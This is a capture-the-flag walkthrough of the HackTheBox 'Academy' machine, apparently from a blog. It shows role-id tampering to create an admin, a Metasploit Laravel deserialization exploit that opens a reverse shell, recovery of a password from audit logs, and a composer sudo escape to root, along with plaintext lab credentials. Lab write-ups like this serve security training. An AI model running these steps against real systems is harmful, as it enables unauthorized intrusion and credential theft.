HackTheBox - Academy write up
5 min read

HackTheBox - Academy write up

HackTheBox - Academy write up

Academy is a Easy Linux box created the 7 November 2020.


Port scan :

$ nmap -A -p -1024 -oN scan.nmap

22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
| 3072 c0:90:a3:d8:35:25:6f:fa:33:06:cf:80:13:a0:a5:53 (RSA)
| 256 2a:d5:4b:d0:46:f0:ed:c9:3c:8d:f6:5d:ab:ae:77:96 (ECDSA)
|_ 256 e1:64:14:c3:cc:51:b2:3b:a6:28:a7:b1:ae:5f:45:35 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Hack The Box Academy
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Only SSH on port 22 and a Apache Web Server on port 80 are open.


There is the apache web page :


I intercept the request when we try to register a user.

We can see the username & password, but what is the roleid variable ? If you change it to 1, you can create admin user :)

While I was looking at the website, gobuster found us different pages :

/index.php            (Status: 200) [Size: 2117]
/login.php            (Status: 200) [Size: 2627]
/register.php         (Status: 200) [Size: 3003]
/images               (Status: 301) [Size: 311] [--> http://academy.htb/images/]
/admin.php            (Status: 200) [Size: 2633]
/home.php             (Status: 302) [Size: 55034] [--> login.php]
/config.php           (Status: 200) [Size: 0]
/server-status        (Status: 403) [Size: 276]

Let’s go to admin.php and log in with our admin user named toto. It works ! Now we have this todo list :

We can see the last issue is pending. Let’s add the virtual host to /etc/hosts. academy.htb dev-staging-01.academy.htb

Let’s visit dev-staging-01.academy.htb.

This is a Laravel (PHP framework) app. Thanks to the debug mode, we can retrieve some variables :

APP_NAME  "Laravel"
APP_KEY   "base64:dBLUaMuZz7Iq06XtL/Xnz/90Ejq+DEEynggqubHWFj0="
APP_DEBUG   "true"
DB_HOST   ""
DB_PORT   "3306"
DB_DATABASE   "homestead"
DB_USERNAME   "homestead"
DB_PASSWORD   "secret"

User #1

After some research, we can find a Laravel exploit on metasploit.

msf6 exploit(unix/http/laravel_token_unserialize_exec) > show options
Module options (exploit/unix/http/laravel_token_unserialize_exec):
   Name       Current Setting                               Required
   APP_KEY    dBLUaMuZz7Iq06XtL/Xnz/90Ejq+DEEynggqubHWFj0=  no
   Proxies                                                  no
   RHOSTS                                  yes
   RPORT      80                                            yes
   SSL        false                                         no
   TARGETURI  /                                             yes
   VHOST      dev-staging-01.academy.htb                    no
msf6 exploit(unix/http/laravel_token_unserialize_exec) > run
[*] Started reverse TCP handler on 
[*] Command shell session 2 opened ( -> at 2020-12-22 18:49:42 +0100
[*] Trying to find binary(python) on target machine
[*] Trying to find binary(python3) on target machine
[*] Found python3 at /usr/bin/python3
[*] Using `python` to pop up an interactive shell
[*] Trying to find binary(bash) on target machine
[*] Found bash at /usr/bin/bash
uid=33(www-data) gid=33(www-data) groups=33(www-data)

We have a shell !

User #2

Time to privesc (Privilege Escalation) !

I find some passwords in application source code but it was not interesting, then I find this environment file :

www-data@academy:/var/www/html/academy$ cat .env

This password was reused by one of the users.

www-data@academy:/home$ su cry0l1t3
Password: mySup3rP4s5w0rd!!
$ bash

Our user is in the adm group, so we can read all the logs file in /var/log. Let’s find some passwords :

$ id
uid=1002(cry0l1t3) gid=1002(cry0l1t3) groups=1002(cry0l1t3),4(adm)
$ grep -RE 'comm="su"|comm="sudo"' /var/log/ 2>/dev/null
/var/log/audit/audit.log.3:type=TTY msg=audit(1597199293.906:84): tty pid=2520 uid=1002 auid=0 ses=1 major=4 minor=1 comm="su" data=6D7262336E5F41634064336D79210A
$ aureport --tty
1. 08/12/2020 02:28:10 83 0 ? 1 sh "su mrb3n",<nl>
2. 08/12/2020 02:28:13 84 0 ? 1 su "mrb3n_Ac@d3my!",<nl>
1) unhex(6D7262336E5F41634064336D79210A) = mrb3n_Ac@d3my!
2) aureport a tool that produces summary reports of audit daemon logs
--tty Report about tty keystrokes

We got mrb3n’s password !


Time to get root !

mrb3n@academy:/dev/shm$ sudo -l
[sudo] password for mrb3n: mrb3n_Ac@d3my!
Matching Defaults entries for mrb3n on academy:
    env_reset, mail_badpass,
User mrb3n may run the following commands on academy:
    (ALL) /usr/bin/composer

Thanks to GTFOBins, we know how to run shell command with composer. We have the sudo on composer, so we can run shell command as root :)

mrb3n@academy:/dev/shm$ TF=$(mktemp -d)
mrb3n@academy:/dev/shm$ echo '{"scripts":{"x":"/bin/sh -i 0<&3 1>&3 2>&3"}}' >$TF/composer.json
mrb3n@academy:/dev/shm$ sudo composer --working-dir=$TF run-script x
PHP Warning:  PHP Startup: Unable to load dynamic library 'mysqli.so' (tried: /usr/lib/php/20190902/mysqli.so (/usr/lib/php/20190902/mysqli.so: undefined symbol: mysqlnd_global_stats), /usr/lib/php/20190902/mysqli.so.so (/usr/lib/php/20190902/mysqli.so.so: cannot open shared object file: No such file or directory)) in Unknown on line 0
PHP Warning:  PHP Startup: Unable to load dynamic library 'pdo_mysql.so' (tried: /usr/lib/php/20190902/pdo_mysql.so (/usr/lib/php/20190902/pdo_mysql.so: undefined symbol: mysqlnd_allocator), /usr/lib/php/20190902/pdo_mysql.so.so (/usr/lib/php/20190902/pdo_mysql.so.so: cannot open shared object file: No such file or directory)) in Unknown on line 0
Do not run Composer as root/super user! See https://getcomposer.org/root for details
> /bin/sh -i 0<&3 1>&3 2>&3
# id
uid=0(root) gid=0(root) groups=0(root)
# cat /root/root.txt

Rooted !

Enjoying these posts? Subscribe for more